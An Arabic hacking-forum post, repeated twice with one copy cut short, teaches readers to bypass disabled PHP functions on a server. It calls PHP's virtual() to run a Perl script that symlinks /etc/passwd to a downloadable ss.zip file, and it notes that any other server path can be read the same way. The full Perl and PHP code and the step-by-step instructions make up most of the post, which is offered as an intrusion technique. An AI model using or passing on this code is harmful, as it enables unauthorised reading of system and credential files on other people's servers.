S4udi h4ck
katem
[حصريآ]تشغيل البيرل بأحد دوال php
السلام عليكم ورحمة الله وبركاته
كيف الحال ياعيال إن شاء الله بخير ...
دالة virtual
هالطريقه نادر اللي يعرفها ويمكن محد فكر فيها و الطريقه من اكتشافي و استنتاجي
طبعاً راح نشغل البيرل ليس مثل ملف cgi-telnet او اي شيل ثاني بالبيرل
هالدالة تشغل اي كود بيرل يطبع امر ماء على الصفحة وهو طبعاً يستفاد بالسيرفر لتنسيق html
لأصحاب تطوير المواقع و برمجة السكربتات ونادر بالمره انك تلقى سيرفرات حاطه الدالة من ضمن
الدوال الغير مفعله ...
راح اعطيكم كود تضعونه بملف بيرل
كود PHP:
. . ."; }
زي ماهو مبين بكود البيرل أنه راح ينشىء اختصار عن طريق Symlink
لملف /etc/passwd بملف اسمه ss.zip
ترفعه على السيرفر وطبعاً اعطاءه تصريح 755 وعطيناه اسم ss.pl
وتنشأ ملف php بإستخدام دالة virtual
كود PHP:
<?php
virtual("./ss.pl");
?>
ارفع ملف الـ php على نفس مسار ملف البيرل
وافتحه من المتصفح وراح يجيك نفس اللي بهالصوره
راح يقول
ss.zip Symlink Created Successfully
حمل ملف ss.zip وافتحه عن طريق المفكره (Notepad) وراح تلقى محتوى /etc/passwd
الملف في المرافقه
بإمكانك تغير المسار إلى اي مسار اخر تبي تقرأه على السيرفر ...
و أيضاً تستطيع إستعمال دوال اخرى للبيرل ...
و إن شاء الله يكون الشرح مفهوم للجميع ..
أهداء الي منظمة : kala$nikoV
smilies15
و بالتوفيق ...
G0D-FaTH3R
كيف الحال ياعيال إن شاء الله بخير ...
دالة virtual
هالطريقه نادر اللي يعرفها ويمكن محد فكر فيها و الطريقه من اكتشافي و استنتاجي
طبعاً راح نشغل البيرل ليس مثل ملف cgi-telnet او اي شيل ثاني بالبيرل
هالدالة تشغل اي كود بيرل يطبع امر ماء على الصفحة وهو طبعاً يستفاد بالسيرفر لتنسيق html
لأصحاب تطوير المواقع و برمجة السكربتات ونادر بالمره انك تلقى سيرفرات حاطه الدالة من ضمن
الدوال الغير مفعله ...
راح اعطيكم كود تضعونه بملف بيرل
كود PHP:
HTML:
#!/usr/bin/perl -w
$target="/etc/passwd";
$distension ="ss.zip";
print "Content-type: ****/html\n\n";
print '<**** ****="#C0C0C0" bgcolor="#000000">';
$symlink = symlink($target,$distension);
if($symlink == 1) { print " $distension Symlink Created Successfully . . ."; }
else { print "Cannot Symlink File or File $distension Already Exists
زي ماهو مبين بكود البيرل أنه راح ينشىء اختصار عن طريق Symlink
لملف /etc/passwd بملف اسمه ss.zip
ترفعه على السيرفر وطبعاً اعطاءه تصريح 755 وعطيناه اسم ss.pl
وتنشأ ملف php بإستخدام دالة virtual
كود PHP:
<?php
virtual("./ss.pl");
?>
ارفع ملف الـ php على نفس مسار ملف البيرل
وافتحه من المتصفح وراح يجيك نفس اللي بهالصوره
راح يقول
ss.zip Symlink Created Successfully
حمل ملف ss.zip وافتحه عن طريق المفكره (Notepad) وراح تلقى محتوى /etc/passwd
الملف في المرافقه
بإمكانك تغير المسار إلى اي مسار اخر تبي تقرأه على السيرفر ...
و أيضاً تستطيع إستعمال دوال اخرى للبيرل ...
و إن شاء الله يكون الشرح مفهوم للجميع ..
أهداء الي منظمة : kala$nikoV
smilies15
و بالتوفيق ...
G0D-FaTH3R
المرفقات
اسم الموضوع : [حصريآ]تشغيل البيرل بأحد دوال php
|
المصدر : قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات